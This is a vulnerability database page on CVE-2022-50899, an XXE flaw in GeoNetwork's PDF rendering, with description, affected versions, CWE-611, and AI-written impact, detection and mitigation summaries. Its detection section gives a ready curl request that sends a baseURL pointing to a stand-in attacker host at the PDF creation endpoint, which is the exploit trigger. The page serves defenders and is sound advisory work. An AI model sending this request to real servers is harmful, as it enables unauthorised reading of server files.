CVE-2022-50899
Unknown Unknown - Not Provided

XXE Vulnerability in Geonetwork PDF Rendering Allows File Disclosure

Vulnerability report for CVE-2022-50899, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-01-13

Last updated on: 2026-02-27

Assigner: VulnCheck

Description

Geonetwork 3.10 through 4.2.0 contains an XML external entity vulnerability in PDF rendering that allows attackers to retrieve arbitrary files from the server. Attackers can exploit the insecure XML parser by crafting a malicious XML document with external entity references to read system files through the baseURL parameter in PDF creation requests.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-01-13
Last Modified
2026-02-27
Generated
2026-07-06
AI Q&A
2026-01-14
EPSS Evaluated
2026-07-05
NVD

Affected Vendors & Products

Showing 1 associated CPE
Vendor Product Version / Range
osgeo geonetwork From 3.10.0 (inc) to 4.2.0 (inc)

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-611 The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Executive Summary

CVE-2022-50899 is an XML External Entity (XXE) vulnerability in GeoNetwork versions 3.10 through 4.2.0. It occurs during the PDF rendering process when the application processes XML input without securely configuring the XML parser. Attackers can craft malicious XML documents containing external entity references and submit them via the baseURL parameter in PDF creation requests. This allows them to retrieve arbitrary files from the server by exploiting the insecure XML parser, potentially reading sensitive system files. [1, 2]

Impact Analysis

This vulnerability can allow attackers to retrieve arbitrary files from the server hosting GeoNetwork, potentially exposing sensitive information such as system files. Since the attack requires no privileges or user interaction and can be performed remotely over the network, it poses a significant confidentiality risk. The attacker can exfiltrate sensitive data, which could lead to further exploitation or compromise of the affected system. [1, 2]

Detection Guidance

This vulnerability can be detected by monitoring for suspicious POST requests to the endpoint `/geonetwork/pdf/create.json` that include a JSON payload with a `baseURL` parameter pointing to an external XML file. You can use network monitoring tools or web server logs to identify such requests. For example, using curl to simulate or detect such requests: `curl -X POST -H "Content-Type: application/json" -d '{"baseURL":"http://attacker/xxe.xml"}' http://your-geonetwork-server/geonetwork/pdf/create.json`. Additionally, inspecting logs for unusual external URL references in the `baseURL` parameter or unexpected XML processing errors may help detect exploitation attempts. [1]

Mitigation Strategies

Immediate mitigation steps include restricting or disabling external entity processing in the XML parser used by GeoNetwork during PDF rendering. If possible, update GeoNetwork to a version later than 4.2.0 where this vulnerability is fixed. Additionally, implement network-level controls to block outgoing requests to untrusted external URLs from the GeoNetwork server, especially those targeting the PDF creation endpoint. Monitoring and filtering incoming requests to ensure the `baseURL` parameter does not reference untrusted external resources can also reduce risk. [1, 2]

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2022-50899. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart